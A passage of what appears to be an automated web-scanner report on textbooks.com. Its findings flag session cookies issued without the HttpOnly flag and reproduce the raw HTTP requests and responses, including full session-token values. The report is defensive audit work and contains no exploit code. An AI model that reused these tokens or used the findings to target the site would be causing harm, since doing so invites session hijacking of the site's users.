Set-Cookie: TBSESSION=NSuBfBZxQLlmKeVpj2p9K6GXP2Xq3GqdlF1j29JhhP49qoDnj2VhPtF%2BzSMKT9eCs63vmDbUC14gRGlgOHW7iFnIz0nKPe4%2F28zhfUjEeIK6BU0mxbEy6a8NP6ZcHZDS0d%2BGLBJoPYFfBELmQxETjIyvr2JM1BckKpl0%2B%2BGweX4L3LRDN5hyWbPjFFZsQpfxoALTnPu69wrYw9YLAXXnWMwe5PvA0km5HWA%2BQM88x8U%2FaM68vO5NjBdmH3FR0tXFt%2F6F28h524nLS4lf8W3thACm9zITvDf9NoE17qU5XvOcrc08uQ2cku7dv5vkw0PHJpGld9fII2rcIRrLbO9cOObvvaao7XCozluY12rqImY2KgnOG36TKR8T918yXmNWsyM3AlfUA52%2FBahT0cp2ZTZqBJ0gudZ6OAXk6cPNIt%2BakJpEpqp7rJb06ioOGUX%2F1Vi5pB9JNB6fyvmXx4d6gSsxttlSjtElFEUfjQtr053LITRw%2Fb8vRkQ0VhDtfiGE9Jcij5xSVEEO0ox9LYAb%2F2xs5ZXXXRDG7ih2dMYCY59Q8bg3yKOWfSV6J0vEevFy%2BTGbXwnm8kVPW6L%2BuUyAcSDBWicdfRqSPGZ%2FDpayY%2BG2mJaKC5pg6uBJ3ZyqnE%2F4SB9F0KOBuSYIBozjljgRga2cOEwLRVzeiEn1gaaZHSm75%2Bkejm8YlEWk1rsoaCWeQzSyWkgT6CbSxr9GvZ7Kv7kAFjwY8qskCs6Ory5E4qfg45Uwz3%2BYuzWGBhD9Ux5cir%2BY5XNzM%2FeXU4T0SPQl5V7i6pIVw6m8y7uglKdwbCqgGE%2ByDp0mERMZCSrcclffc3ivX7zLrQhW9UPAvTQpdDdX4%2BQ6HF%2Ft9qMV1LK%2BWKfooVLyowzRgeBdLcKqC6ZKqQbX%2Bx2W5dlseuvChLi5UwH51Tl1%2B5QeNrbdUs%2Fb2%2FzzUAVe12METH%2Bb9HtMkeFT1j6YkC6YeYNtovu6DuRv2OxcGW1RLzACktX%2Fp98Xk4%2B5qYvnNceL8VBb0sUyDTMbclqZrXvHjROfKugoAIttOGs1mzIDvbdpm5bXNAAfXzZU2bJqbIAmibKVtX3NFe5E0f32%2B85IUuosNZ%2Bv6vO%2Br1HgpsZg%2FnRyj3L6LQ7MJb316arXbMKidws9b4f%2BDLk%2FhD5rdtYjKA8WvrDfpRnOJYFB2oPEBYC3Gz0EADTnhRY%2BD2TTQnYCXd7dPyZaiFtT5cBJs6NP5syouTWXfoYCkgP%2Fl5M2pKt00u0Wx%2B9sMSOI3gSj%2BMLyTaNj8bA%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=cqnUxW8NCiD%2BXzL8wDU%3D; expires=Mon, 26-Dec-2011 13:53:05 GMT; path=/; domain=.textbooks.com
Content-Length: 55229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta name="keyw
...[SNIP]...

4.23. http://www.textbooks.com/buy-textbooks.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /buy-textbooks.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /buy-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=%2BXtVJGYHo3mlKCIO6uOjhqxhveDjwNpBbuHWVtbh8Gm7JgD2rX11pMKyI9%2BQFysTcmyvJS9XeGRcLRFjQeRkSDnACvzpdJiA7jxBwTixZ5rnl36UXVni%2FxgMaTE3rDzwSX8mQzQUCJxIUhieDsn3QnrqBsMcoZSZCF%2BCOJXpWeh5le7dM%2BNL5g5z%2F%2Fps5zbn8%2FnJOeEH0pZT2obBQ2kK3ETq0S2D3%2B6Rl760NIZrMwumRmQL7RSjBErU%2FHKyMLNo6FYb0Glu6LcoFpsHG4xzpBYPbAK4DN1mOGSkKEUFyxz8d8c45vlwUFbo69jfmLt%2BVzlSxrXC877DtUBSuUgrMRpI3XrqT657VIIBBsUW2zhYaC9j728B7jm2paAXwp%2BPRecf0EFU4xDpmyKWYL3W%2BU7ijPKdQI%2F0MlC2iV0rYs87eFEAMV9QSPCf9Ogy6jpnN5gtffB5EU2mXjQRVupmFKgMidJu680VRfflPt06AGmwQtuM6VtAvIe6vugo1nbIjnnfTxOfatndyOr%2Fs%2BW7I%2FzHheTTfNagKyEtHChaKKm5mk7GyBLxTbaFPYYNEO75XTdqUkpqkpvF6xunkyYn29rRa1gk3f6bFMK2w%2FIeatojhK0etUPlwEkCTqf2kHD1IUBKM7WTmICPwBFWy3ZDjUlPKShDG6gXnNuC7L24VcRZufhOkz5t%2BELd51guT5NLTgDXLuB3Yfz0InuF4wt6f7Fuj1bln6YNCKckbZnubS2oSQ74iPHbib%2FNsW7NPE4Kns1jA1wUTRE5VsECqhFYhSBLoSrf%2ByEa3Lp2%2FBf487Z1K1237xfKrjZjIQ41kYC8qoW1eOwPiEH0lmiu4W6u44KOOKCGKd7T5ZLOVflFVF7cufY35%2B058j0p9%2BH3HW1B9hHCUdCiA2AJOwO%2FaPlIJGrvesRxbQtvuaO94Z9ZJwwH8CiN9EoTbEBAlyc%2BUoYPJ0hsQYx6Gv4m30fqhctWj5nWs4HODbYXQ0ftY32RZiD%2FeTtAS87mZmPHHJy9ny%2FCK06TR7dJyOeowsJmWqd3ZKgKsnHkWnrDwfQoW8gqtPnR5c79c0XUymbZoxIrRCEDZxlYDs98Rxbszwl0prmCZHtdjZHz799IS7k7t73CdyrjrltfqyTLaA6U3h6lv1KC4DqRCGfOc8HMzm4wqx0%2Fx3%2F2nRPgPadviz6Qp4DH4CeXmmOh7OQyHlIDjM%2B64C%2FM1j0D5MQnE6M12sBIw%2BbS0N46znX2isHbdWqnuL8dgYNCJZnAJd7QdMNYe%2BQ%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=AmOCzIVFPte8ojCPQx4%3D; expires=Mon, 26-Dec-2011 13:51:57 GMT; path=/; domain=.textbooks.com
Content-Length: 61327


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.24. http://www.textbooks.com/etextbooks.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /etextbooks.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /etextbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=Pbk2zJyA8AE3TFrTqb2spaGwWBp5fz8HvEQD88AlWpwL760JR1jSFrZnXeH4WrLwIDiWmNrqfND9qJspcMZT4Kpj1Y7fHKHkf%2BHnIAjFDoFOZkuevMg9KXcgpFZaPB79Bv%2FMmDw31nJJ4wpzfW9y3t1XykAB9NVBARjIbg%2F2%2BdCQO%2FtL60u7%2FW51ZKwfLpMJVuxvqZi8UPWkkWdQh0E7ljYzAa1pW7%2Bu6B4eIdO1Ys33T2YRyapxvsDcanPAsMXkVDJFj2R9XQ5%2FZZ8UOzBkS8nWw9UEqcUjEDC2PuFlRoEjA09UcABoUb0eHErfvmOsosLDdq7Ro5YLXw955cnUadphO8mzRY2exRZe%2BZkOXQobYPzMc6HYKioy2wI9RyIyS6%2BNuBMOxIxwoC8rqStJJ8pTYfZQfuAa1JQQQruc9fG%2B2dFIU%2B2SLrXwsw1KfAP4r15ynWkXmh%2BMmhZ9sApr08IeV7AeG0ZFhR6PSNqLzUrwJHJlexJUiXFmKs38Z1Kg9h8eEHrZ1Wm8to8wqN1%2Fcc7x8x8n3ANy%2B7MOLbGElcCRhzQCw8Bg%2FwhodX8iZPPopZ5eeDz%2BZ3MKpwDSLOfx%2FKNcykivltXCVYSnk3lpgn7zbUI9p3QCLM8NkfNDpxaF%2B8ghgPaUyFsFnsd3Z0Vjg1NHay2se3%2BGgB9DdCLq3xL4%2F0zf2ceHWHflLhndU9G%2FA14jzNozTWVtwocyZKBmmkNT0ZLhv9R9EltOqH4wTJZBCMjMXlOt%2BDAMkfM%2BvQvUzF12sR7HRc6157s07zyouCOzVSnXCGTeKQH6TcJ6DGrODApiAyvA5Hk6he6y1qV2KqjPWwYufG80oa%2BbJ9avXFRU0xgpuYnX3L%2BzjmU6oiUEwZA745IyWLTIGGUht%2Fub0Sg48hoCRt5395zXpp7dKZAjvruKpXnJ7ErwccTX8YtADj9ZixHHwnQF0kL8v6E8RwYJhyGAd%2BxbhBJC3XH7gsc11jRw8iYqYDVA8xKHQxVYGaL6Vr43iJ6cHPkMxsDtzbmR%2BarJs1OanYNc2PVYoAZvrdfAQBm3VppTVNcpBJ4ATbUNHZUwwAwz2oyLd7yHQYOwCSVjbz4eDM43SyEjUgmRXtpf1ol0PBXvCNA3%2F9g89AxIk2pADswI8SHbm3IqiYblTfJy0luOrTbdNfqsdw5b7NJab8DP%2BC0uILbc6VRmnmcL6iT42bd3Hi7llP1l1Lal7AvNMdnVbebi4c%2FZ2HlALQTyIaZt7N%2BGH%2BZIFve1iZOablhb3oDCnxY%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=j%2B55cxm1jR4qZ2uZPCY%3D; expires=Mon, 26-Dec-2011 13:53:06 GMT; path=/; domain=.textbooks.com
Content-Length: 49082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.25. http://www.textbooks.com/rent-textbooks.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /rent-textbooks.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rent-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=r8wgw2O3LRvekHnnSCinxzMGvHch1ZumiUZuZ%2FyCQO8FR7%2Bj2lwFw%2BaEgnFb0FVASMV62J29dLbD3ERoy%2FqQ0TmEINT4kI3WrPXh9%2FL%2FlHjpIlZMGrTmS8gaVO1NCuWiC8JzPYv7hXujuH57rDAeiIarCGifKvBFGamTFNiaJXZ6hTs1TbRdTv4c7NG%2BJNIO299OLfsRFMyqB2b7TLgyYWjU1pxnyfDFvogj3j6FjoEEGnQjebI%2BSnXXO8QfyHC2MIqXvctl0qm2dxYU5bxsCJYsWiEYZKK%2FEcZcD9fqDlnekZPV%2FtvipiJhnkDjbq5Gq1dyMhMt6v6mJLDbvtocozMG4hrfj9ljfrUk4YgL4OKLHoBvcVLq9qk0X10I9fgAgneCqFCl08kFJisbeXAqd8%2FvgbsGvdwR48%2BVc3aOg1YxXQh0KDFlyhLSbV2CovOOLI2Zqoln%2FWfqvd%2FbpPgynWR%2BiYw8r8iXPyRu0Y2YjsxZ61oYybwoTlR2%2BLwiZKS%2B8YS%2Bdef4nl%2FTKeuqHMlQlycqoSH11aUhmACBFvQZBT5QuWKg4uC4IrcjwT3THq%2BAOLcNe2JDR3teW53EY9HVNMpM3PxyKloEG%2BI278WPRTJRS7PcEokchzPLsV6P9iVRE8pzhWJ07Yt40TJ0tbkxgOLJ3Rnl9u%2FUdtvLI0IJaDle2WUoNyYZWThghEHElv5ed7T8lCS9JWXhB5SedvWEGuzZZzLoHhum6wup4fnEdM7kvp7e9lbpMepQYzMXwb244Ey9YYhJiASnXk%2BS0kwSXJrDSj4Nv8rQQr16MWkmfSIcjzpjL1CjrginwZMsTumgzpxdiZYBq5wAE2b4cLPZpYiC79%2Bu6wP%2FeA2kyVMp4szfNJSU%2BdmlUDkMlmcZRoFr2RB%2FirehTIbzbQIx63ZEcd5H9f7qci6%2BaSZdMtC%2FqeyfJPuhX%2B7IVup3xo%2BE6PUemTJbna%2FTFbny3TjgF5qvC8%2Bidb0rEZpsOVk%2B0t1v6XQzM2TcZZkMMWYdKAPm0uwc1AXbiFgYyt6fPq94QFlszqdKbiZDgEhQSDCS3yj8%2FMpEJ9oPwuGNB2iVjLcoy1rZ8dUdotmAEKdKaAbdkZaGzxlsXQ3IktqqbUCP0IQ6oTKgOyBEBLu5xQkMnPVk2wkHK8Xby70hJqvibpCPowktXUetw0J3ZDx79NJv3SdJ3PYP7TZc6VLsIFf%2FyC4%2FXE5i7kiukEbLsC%2FHrjQz3dKX4qTBre7X8Jq8SfdwecfeCg30NiLMfxeh4kulrs8%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=jmetkS3kpyLzouadTgQ%3D; expires=Mon, 26-Dec-2011 13:51:58 GMT; path=/; domain=.textbooks.com
Content-Length: 38984


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.26. http://www.textbooks.com/sell-textbooks.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /sell-textbooks.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sell-textbooks.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BBVC=deleted; expires=Sat, 26-Dec-2009 13:51:57 GMT
Set-Cookie: TBSESSION=RCVA2ltk80NW5Jf0Wl2Hp4znffWSrQPDUOtKIA0u%2FqlL%2FjYVd9r7rK57RoHO3klBemBEgmBjtjvqvzgYhIp7eeLgDA0I9MrFfURtlqwtx2BKN1IzFW4VuXlqki%2FIkLRfXjm71k0alz0rL9l4RKuXms1dz6YxpQlfct0kt2KO0nEqx9%2BJZwh8ydTHKfsSpN7asjXPWt9h1ZwYKBsJpAeil6JLAb91657JBthMgkmCg1dWpyOFt%2BO2%2F6IuWFiBvyfeDqld2XYdPmwncoE8r6H%2BiVS5foiEy7Obglt6qPLPrO8CnwOaGcTCUn9GIPasy266mXMSTxo0ZHFN5z7D%2FMi15PhmDLLLcVW9NDAa%2FZtn0z7Aic55u9ajBWXJje2dG5j%2Bwex47GhkRb8SCxa3h9eYD%2BFF8ODsBw8fKdAE9fJhe5sX%2BGSaDH%2BblHWcaDvOD%2BuAHHVC9867%2B8IVRD9A32ieqt2eWyCzXbPmyuAst2gKg8riGQ%2Bd0lFPTMmQkk%2FNvKgMcR5uxwUaiYK8OrTmO73yRrtAUjTDKt2fg5h2DMXa4g%2FUFbpL%2FBacwzt9qk6Qb4HbW2ALDFrKULxNGBQ0zGDrCy%2B0gRX%2ByS0XNKnGUzF%2FjsRLCRxSbeGmexVSotL%2FxQC7HJGtLp0EJGcsuyMXOTyFUuCvkxrHpaa8TjORbwlnxc33ZKOZYz9oh21tfBmWeSFFiQzRBMMMgGLgIMst99cK6FRxOPUF0Y9fQuKqJVCeEwCD8Ap6XRE0LwljO69yT6txlmkuUYSR5czrJH87PwlN%2B6EOzOJSQx05kVzChR8bdRUIacjCSLcxPeBAdFuHDsDAoOMGLxcRafAmk1RtanCiUFE6YO2rXCOjadz7bR%2FxELgt%2BLrYjgq8Nt%2FZ70rAyyE4Qbwm1XKfIy8i0YqG3jmQ6I6ZQyps%2FWburUYbt7DYRjkSxUE%2F%2BDleyB4Pv7WZEJ0v8z7v3lV